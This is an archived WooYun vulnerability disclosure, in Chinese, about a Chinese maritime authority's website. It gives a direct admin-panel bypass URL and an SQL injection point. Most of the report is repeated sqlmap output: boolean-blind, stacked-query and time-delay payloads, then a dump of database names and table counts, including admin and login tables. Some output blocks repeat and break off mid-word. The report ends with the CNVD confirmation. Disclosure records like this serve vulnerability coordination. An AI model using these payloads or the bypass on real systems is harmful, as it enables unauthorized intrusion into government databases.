乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-17: 细节已通知厂商并且等待厂商处理中 2015-06-22: 厂商已经确认,细节仅向厂商公开 2015-07-02: 细节向核心白帽子及相关领域专家公开 2015-07-12: 细节向普通白帽子公开 2015-07-22: 细节向实习白帽子公开 2015-08-06: 细节向公众公开
安徽省蚌埠市海事局存在SQL注射+绕过权限进后台
首先说下绕过:直接输入后台http://www.bbmsa.gov.cn/admin/index.htm
然后我们来说注射:http://www.bbmsa.gov.cn/ggfw/zthd.aspx?id=108 (GET)
sqlmap identified the following injection points with a total of 65 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] bbhsj[*] master[*] model[*] msdb[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server opsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] bbhsj[*] master[*] model[*] msdb[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server opsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] bbhsj[*] master[*] model[*] msdb[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=108 AND 5123=5123 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=108; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=108 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] bbhsj[*] master[*] model[*] msdb[*] tempdbDatabase: bbhsj+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.web_PublicServices | 2721 || dbo.web_GuestBook | 307 || dbo.web_Subject | 84 || dbo.web_SysRights | 23 || dbo.web_Manager | 21 || dbo.web_FellowLink | 9 || dbo.aspnet_SchemaVersions | 6 || dbo.web_PictureRotation | 6 || dbo.sjjlbiao | 4 || dbo.web_Customs | 4 || dbo.caozuoyuan | 3 || dbo.Contact | 1 || dbo.web_Reply | 1 || dbo.web_UnderlingUnits | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 76640 || sys.sysmessages | 76640 || sys.dm_os_memory_objects | 23586 || sys.dm_os_buffer_descriptors | 13476 || sys.syscolumns | 11273 || sys.all_parameters | 6761 || sys.system_parameters | 6761 || sys.dm_os_memory_cache_entries | 5443 || sys.syscacheobjects | 5388 || sys.trace_subclass_values | 4729 || sys.dm_exec_cached_plans | 4608 || sys.dm_exec_query_stats | 4457 || sys.all_columns | 4307 || sys.trace_event_bindings | 3965 || sys.system_columns | 3749 || sys.syscomments | 2796 || dbo.spt_values | 2346 || sys.dm_os_ring_buffers | 1919 || sys.all_objects | 1839 || sys.sysobjects | 1839 || sys.dm_os_virtual_address_dump | 1800 || sys.system_objects | 1773 || sys.database_permissions | 1679 || sys.syspermissions | 1678 || sys.sysprotects | 1676 || sys.all_sql_modules | 1623 || sys.system_sql_modules | 1621 || sys.system_internals_partition_columns | 693 || sys.dm_os_performance_counters | 644 || sys.sysperfinfo | 644 || sys.columns | 558 || sys.dm_exec_query_transformation_stats | 380 || sys.stats_columns | 291 || sys.all_views | 286 || sys.system_views | 286 || sys.index_columns | 219 || sys.sysindexkeys | 219 || sys.dm_os_wait_stats | 202 || sys.event_notification_event_types | 193 || sys.sysindexes | 173 || sys.trace_events | 171 || sys.stats | 167 || sys.dm_os_latch_stats | 138 || sys.dm_os_memory_clerks | 131 || sys.syscharsets | 114 || sys.allocation_units | 112 || sys.system_internals_allocation_units | 112 || sys.dm_db_partition_stats | 101 || sys.indexes | 101 || sys.partitions | 101 || sys.system_internals_partitions | 101 || sys.system_components_surface_area_configuration | 99 || sys.xml_schema_facets | 97 || sys.dm_os_memory_cache_clock_hands | 96 || sys.xml_schema_components | 93 || sys.dm_db_index_usage_stats | 88 || sys.dm_os_loaded_modules | 83 || sys.xml_schema_types | 77 || sys.objects | 66 || sys.trace_columns | 65 || sys.configurations | 63 || sys.sysconfigures | 63 || sys.syscurconfigs | 63 || INFORMATION_SCHEMA.COLUMNS | 50 || sys.fulltext_document_types | 50 || sys.dm_os_memory_cache_counters | 48 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || sys.dm_os_threads | 44 || sys.dm_exec_query_optimizer_info | 38 || sys.dm_os_memory_cache_hash_tables | 38 || sys.dm_os_worker_local_storage | 36 || sys.dm_os_workers | 36 || sys.dm_os_memory_pools | 34 || sys.syslanguages | 33 || sys.systypes | 27 || sys.types | 27 || sys.dm_db_session_space_usage | 24 || sys.dm_db_task_space_usage | 24 || sys.dm_os_tasks | 24 || sys.sysprocesses | 24 || sys.dm_exec_sessions | 23 || sys.securable_classes | 21 || sys.trace_categories | 21 || sys.dm_tran_active_transactions | 20 || sys.dm_tran_database_transactions | 20 || sys.dm_exec_requests | 19 || sys.server_principals | 19 || sys.fulltext_languages | 17 || sys.server_permissions | 17 || sys.xml_schema_component_placements | 17 || sys.database_principals | 16 || sys.sysusers | 16 || INFORMATION_SCHEMA.SCHEMATA | 14 || sys.schemas | 14 || sys.service_message_types | 14 || sys.xml_schema_attributes | 14 || sys.dm_os_stacks | 13 || sys.dm_os_waiting_tasks | 11 || sys.service_contract_message_usages | 11 || sys.master_files | 10 || sys.sysaltfiles | 10 || sys.syslogins | 10 || sys.crypt_properties | 8 || sys.dm_os_schedulers | 7 || INFORMATION_SCHEMA.TABLES | 6 || sys.service_contracts | 6 || sys.tables | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || sys.certificates | 5 || sys.database_mirroring | 5 || sys.database_recovery_status | 5 || sys.databases | 5 || sys.endpoints | 5 || sys.server_role_members | 5 || sys.sysdatabases | 5 || sys.dm_db_missing_index_details | 4 || sys.dm_db_missing_index_group_stats | 4 || sys.dm_db_missing_index_groups | 4 || sys.dm_tran_locks | 4 || sys.syslockinfo | 4 || dbo.MSreplication_options | 3 || sys.dm_clr_properties | 3 || sys.dm_exec_connections | 3 || sys.dm_os_hosts | 3 || sys.identity_columns | 3 || sys.internal_tables | 3 || sys.login_token | 3 || sys.service_queue_usages | 3 || sys.service_queues | 3 || sys.services | 3 || sys.syssegments | 3 || sys.xml_schema_namespaces | 3 || INFORMATION_SCHEMA.ROUTINES | 2 || sys.database_files | 2 || sys.dm_broker_queue_monitors | 2 || sys.dm_exec_query_resource_semaphores | 2 || sys.dm_fts_memory_pools | 2 || sys.key_encryptions | 2 || sys.procedures | 2 || sys.service_contract_usages | 2 || sys.sql_modules | 2 || sys.sysfiles | 2 || sys.tcp_endpoints | 2 || dbo.spt_monitor | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_db_file_space_usage | 1 || sys.dm_exec_background_job_queue_stats | 1 || sys.dm_os_sys_info | 1 || sys.dm_tran_current_transaction | 1 || sys.filegroups | 1 || sys.linked_logins | 1 || sys.routes | 1 || sys.servers | 1 || sys.sql_logins | 1 || sys.symmetric_keys | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysoledbusers | 1 || sys.sysservers | 1 || sys.traces | 1 || sys.user_token | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.MSdbms_datatype_mapping | 325 || dbo.sysdatatypemappings | 325 || dbo.MSdbms_map | 248 || dbo.MSdatatype_mappings | 174 || dbo.syssessions | 163 || dbo.MSdbms_datatype | 141 || dbo.syscategories | 21 || dbo.syssubsystems | 11 || dbo.MSdbms | 7 || dbo.sysmail_configuration | 7 || dbo.backupfile | 4 || dbo.sysdtscategories | 3 || dbo.backupfilegroup | 2 || dbo.backupmediafamily | 2 || dbo.backupmediaset | 2 || dbo.backupset | 2 || dbo.restorefile | 2 || dbo.sysdtspackagefolders90 | 2 || dbo.restorefilegroup | 1 || dbo.restorehistory | 1 || dbo.sysdbmaintplans | 1 || dbo.sysmail_servertype | 1 || dbo.sysoriginatingservers_view | 1 || dbo.systargetservers_view | 1 |+--------------------------------------------------+---------+
危害等级:高
漏洞Rank:11
确认时间:2015-06-22 09:30
cnvd确认并复现所述情况,转由cncert下发给安徽分中心,由其后续协调网站管理单位处置。按多个风险综合评分,rank 11
暂无